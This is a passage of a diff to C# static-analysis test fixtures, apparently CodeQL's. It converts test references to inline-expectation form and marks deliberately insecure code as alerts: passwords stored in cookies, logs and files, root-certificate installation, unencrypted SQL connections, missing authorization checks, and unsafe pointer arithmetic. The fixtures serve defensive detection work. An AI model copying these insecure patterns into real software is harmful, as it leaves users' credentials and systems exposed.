Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref @@ -1 +1 @@ -Security Features/CWE-016/ASPNetMaxRequestLength.ql \ No newline at end of file +query: Security Features/CWE-016/ASPNetMaxRequestLength.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref index 2116949f754e..f2d275efd563 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetPagesValidateRequest/ASPNetPagesValidateRequest.qlref @@ -1 +1 @@ -Security Features/CWE-016/ASPNetPagesValidateRequest.ql \ No newline at end of file +query: Security Features/CWE-016/ASPNetPagesValidateRequest.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref index 86ac50728428..e38b59c5c75a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetRequestValidationMode/ASPNetRequestValidationMode.qlref @@ -1 +1 @@ -Security Features/CWE-016/ASPNetRequestValidationMode.ql \ No newline at end of file +query: Security Features/CWE-016/ASPNetRequestValidationMode.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref b/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref index 68f234e9d372..44a26f7eb0f4 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.qlref @@ -1 +1 @@ -Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.ql \ No newline at end of file +query: Security Features/CWE-020/ExternalAPIsUsedWithUntrustedData.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs index aea3c4e244f8..2298e14e1476 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypass.cs @@ -17,7 +17,7 @@ public Test1(string v) [OnDeserializing] public void Deserialize() { - f = GetString(); // BAD, non-constant and non-object creation expr + f = GetString(); // BAD, non-constant and non-object creation expr // $ Alert } string GetString() { throw null; } @@ -123,7 +123,7 @@ public Test5(int age) [OnDeserializing] void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context) { - Age = info.GetInt32("age"); // BAD + Age = info.GetInt32("age"); // BAD // $ Alert } } @@ -167,7 +167,7 @@ void ISerializable.GetObjectData(SerializationInfo info, StreamingContext contex int age = info.GetInt32("age"); if (false) throw new SerializationException("age"); - Age = age; // BAD + Age = age; // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs index 5d89942f9fe8..ad81a39a9f92 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksBypassBad.cs @@ -16,6 +16,6 @@ public PersonBad(int age) [OnDeserializing] void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context) { - Age = info.GetInt32("age"); // BAD - write is unsafe + Age = info.GetInt32("age"); // BAD - write is unsafe // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref index c5615a7415c4..375a7f00e550 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-020/RuntimeChecksbypass.qlref @@ -1 +1,2 @@ -Security Features/CWE-020/RuntimeChecksBypass.ql \ No newline at end of file +query: Security Features/CWE-020/RuntimeChecksBypass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref index faad1d6403c1..e0b85b8f4c6b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref @@ -1 +1 @@ -Security Features/CWE-079/XSS.ql \ No newline at end of file +query: Security Features/CWE-079/XSS.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs index 4fc60b899e67..42cc1062c2da 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.cs @@ -14,7 +14,7 @@ public unsafe void CalcPointer(PossiblyOverridableClass possiblyOverridable, cha fixed (char* charPointer = charArray) { // BAD: Unvalidate use in pointer arithmetic - char* newCharPointer = charPointer + possiblyOverridable.getNumber(); + char* newCharPointer = charPointer + possiblyOverridable.getNumber(); // $ Alert *newCharPointer = 'A'; // BAD: Unvalidate use in pointer arithmetic int number = possiblyOverridable.getNumber(); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref index c6b75e927954..13eea010dbe7 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-119/LocalUnvalidatedArithmetic.qlref @@ -1 +1,2 @@ -Security Features/CWE-119/LocalUnvalidatedArithmetic.ql \ No newline at end of file +query: Security Features/CWE-119/LocalUnvalidatedArithmetic.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref index fa43c8d49bec..f496f14153c6 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref @@ -1 +1 @@ -Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql \ No newline at end of file +query: Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref index fa43c8d49bec..521ec9079e0e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOffButGlobal/MissingASPNETGlobalErrorHandler.qlref @@ -1 +1,2 @@ -Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql \ No newline at end of file +query: Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref index a4173778d9fa..8bfd3b626d1f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/MissingAccessControl.qlref @@ -1 +1,2 @@ -Security Features/CWE-285/MissingAccessControl.ql +query: Security Features/CWE-285/MissingAccessControl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs index b023dc11e80f..cf1be0cfbfea 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/EditProfile.aspx.cs @@ -7,7 +7,7 @@ private void doThings() { } private bool isAuthorized() { return false; } // BAD: The class name indicates that this may be an Edit method, but there is no auth check - protected void btn1_Click(object sender, EventArgs e) { + protected void btn1_Click(object sender, EventArgs e) { // $ Alert doThings(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs index f9d7316d50b2..4ed7b777d2bf 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test1/ViewProfile.aspx.cs @@ -11,7 +11,7 @@ protected void btn_safe_Click(object sender, EventArgs e) { } // BAD: The name indicates a Delete method, but no auth is present. - protected void btn_delete1_Click(object sender, EventArgs e) { + protected void btn_delete1_Click(object sender, EventArgs e) { // $ Alert doThings(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs index 4b7697f0f88d..13b9f4dd5b5e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-285/MissingAccessControl/WebFormsTests/Test3/B/EditProfile.aspx.cs @@ -5,7 +5,7 @@ class EditProfile4 : System.Web.UI.Page { private void doThings() { } // BAD: The Web.config file does not specify auth for this path. - protected void btn1_Click(object sender, EventArgs e) { + protected void btn1_Click(object sender, EventArgs e) { // $ Alert doThings(); } } \ No newline at end of file diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs index 74a5568b6683..322d755f4ed5 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.cs @@ -12,10 +12,10 @@ public class ClearTextStorageHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: Setting a cookie value or values with sensitive data. - ctx.Response.Cookies["MyCookie"].Value = accountKey; - ctx.Response.Cookies["MyOtherCookie"]["Sensitive"] = GetPassword(); - ctx.Response.Cookies["MyOtherCookie"].Values["Sensitive"] = GetPassword(); - ctx.Response.Cookies["MyCookie"].Value = GetAccountID(); + ctx.Response.Cookies["MyCookie"].Value = accountKey; // $ Alert + ctx.Response.Cookies["MyOtherCookie"]["Sensitive"] = GetPassword(); // $ Alert + ctx.Response.Cookies["MyOtherCookie"].Values["Sensitive"] = GetPassword(); // $ Alert + ctx.Response.Cookies["MyCookie"].Value = GetAccountID(); // $ Alert // GOOD: Encoding the value before setting it. ctx.Response.Cookies["MyCookie"].Value = Encode(accountKey, "Account key"); @@ -23,7 +23,7 @@ public void ProcessRequest(HttpContext ctx) ctx.Response.Cookies["MyCookie"].Value = GetAccountName(); ILogger logger = new ILogger(); // BAD: Logging sensitive data - logger.Warn(GetPassword()); + logger.Warn(GetPassword()); // $ Alert // GOOD: Logging encrypted sensitive data logger.Warn(Encode(GetPassword(), "Password")); @@ -31,7 +31,7 @@ public void ProcessRequest(HttpContext ctx) using (var writeStream = File.Open("passwords.txt", FileMode.Create)) { var writer = new StreamWriter(writeStream); - writer.Write(GetPassword()); + writer.Write(GetPassword()); // $ Alert writer.Close(); } @@ -91,9 +91,9 @@ public void OnButtonClicked() { box1.PasswordChar = '*'; box2.UseSystemPasswordChar = true; - logger.Warn(password.Text); // BAD - logger.Warn(box1.Text); // BAD - logger.Warn(box2.Text); // BAD + logger.Warn(password.Text); // BAD // $ Alert + logger.Warn(box1.Text); // BAD // $ Alert + logger.Warn(box2.Text); // BAD // $ Alert logger.Warn(box3.Text); // GOOD } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected index 74b546faa65f..b7daaaf26e7f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected @@ -1,3 +1,13 @@ +#select +| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | +| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | +| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | +| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | +| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | edges nodes | CleartextStorage.cs:15:50:15:59 | access to field accountKey | semmle.label | access to field accountKey | @@ -10,13 +20,3 @@ nodes | CleartextStorage.cs:95:21:95:29 | access to property Text | semmle.label | access to property Text | | CleartextStorage.cs:96:21:96:29 | access to property Text | semmle.label | access to property Text | subpaths -#select -| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | -| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | -| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | -| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | -| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref index 0fda4720f54a..78dc420e9c8e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.qlref @@ -1 +1,2 @@ -Security Features/CWE-312/CleartextStorage.ql \ No newline at end of file +query: Security Features/CWE-312/CleartextStorage.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected index a6c8142e7d94..e7724d5d586b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.expected @@ -1,3 +1,7 @@ +#select +| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | +| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | edges | Test.cs:15:23:15:27 | access to local variable store : X509Store | Test.cs:18:13:18:17 | access to local variable store | provenance | | | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:15:23:15:27 | access to local variable store : X509Store | provenance | | @@ -16,7 +20,3 @@ nodes | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | semmle.label | object creation of type X509Store : X509Store | | Test.cs:73:13:73:17 | access to local variable store | semmle.label | access to local variable store | subpaths -#select -| Test.cs:18:13:18:17 | access to local variable store | Test.cs:15:31:15:59 | object creation of type X509Store : X509Store | Test.cs:18:13:18:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:28:13:28:17 | access to local variable store | Test.cs:25:31:25:86 | object creation of type X509Store : X509Store | Test.cs:28:13:28:17 | access to local variable store | This certificate is added to the root certificate store. | -| Test.cs:73:13:73:17 | access to local variable store | Test.cs:70:31:70:86 | object creation of type X509Store : X509Store | Test.cs:73:13:73:17 | access to local variable store | This certificate is added to the root certificate store. | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref index f023214a7848..da9f5248b379 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/DontInstallRootCert.qlref @@ -1 +1,2 @@ -Security Features/CWE-327/DontInstallRootCert.ql \ No newline at end of file +query: Security Features/CWE-327/DontInstallRootCert.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs index 8323889cffdd..1c6e3d5e31ff 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/DontInstallRootCert/Test.cs @@ -12,20 +12,20 @@ public class Class1 public void InstallRootCert() { string file = "mytest.pfx"; // Contains name of certificate file - X509Store store = new X509Store(StoreName.Root); + X509Store store = new X509Store(StoreName.Root); // $ Source store.Open(OpenFlags.ReadWrite); // BAD: adding a certificate to the Root store - store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); + store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); // $ Alert store.Close(); } public void InstallRootCert2() { string file = "mytest.pfx"; // Contains name of certificate file - X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); + X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); // $ Source store.Open(OpenFlags.ReadWrite); // BAD: adding a certificate to the Root store - store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); + store.Add(new X509Certificate2(X509Certificate2.CreateFromCertFile(file))); // $ Alert store.Close(); } @@ -67,10 +67,10 @@ public void InstallRootCertRange() new X509Certificate2(X509Certificate2.CreateFromCertFile(file1)), new X509Certificate2(X509Certificate2.CreateFromCertFile(file2)), }; - X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); + X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser); // $ Source store.Open(OpenFlags.ReadWrite); // BAD: adding multiple certificates to the Root store - store.AddRange(new X509Certificate2Collection(certCollection)); + store.AddRange(new X509Certificate2Collection(certCollection)); // $ Alert store.Close(); } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs index a433d5493851..755130ee32fa 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.cs @@ -41,24 +41,24 @@ public void StringInInitializer() public void TriggerThis() { // BAD, Encrypt not specified - SqlConnection conn = new SqlConnection("Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;"); + SqlConnection conn = new SqlConnection("Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;"); // $ Alert } void Test4() { string connectString = - "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd"; + "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd"; // $ Source // BAD, Encrypt not specified - SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); + SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); // $ Alert var conn = new SqlConnection(builder.ConnectionString); } void Test5() { string connectString = - "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false"; + "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false"; // $ Source // BAD, Encrypt set to false - SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); + SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(connectString); // $ Alert var conn = new SqlConnection(builder.ConnectionString); } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected index 83fdf530423a..0f5c27f64c1c 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.expected @@ -1,3 +1,7 @@ +#select +| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | +| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | +| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | edges | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | provenance | | | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:49:20:49:32 | access to local variable connectString : String | provenance | | @@ -12,7 +16,3 @@ nodes | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | semmle.label | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | semmle.label | access to local variable connectString | subpaths -#select -| InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:44:52:44:128 | "Server=myServerName\\myInstanceName;Database=myDataBase;User Id=myUsername;" | Connection string | -| InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | InsecureSQLConnection.cs:50:17:50:64 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" : String | InsecureSQLConnection.cs:52:81:52:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:50:17:50:64 | 